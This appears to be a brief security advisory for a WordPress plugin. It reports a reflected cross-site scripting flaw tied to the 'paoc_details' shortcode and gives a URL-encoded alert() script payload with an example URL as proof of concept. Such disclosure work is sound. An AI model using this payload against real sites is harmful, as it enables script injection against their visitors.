The plugin does not sanitise and escape a parameter before outputting it back in a frontend page, leading to a Reflected Cross-Site Scripting
On a post/page where the [paoc_details display="key_xxx"] shortcode is embed, append the following payload: ?xxx=11111%3Cscript%3Ealert(/XSS/)%3C/script%3E
e.g: https://example.com/2022/06/10/hello/?xxx=11111%3Cscript%3Ealert(/XSS/)%3C/script%3E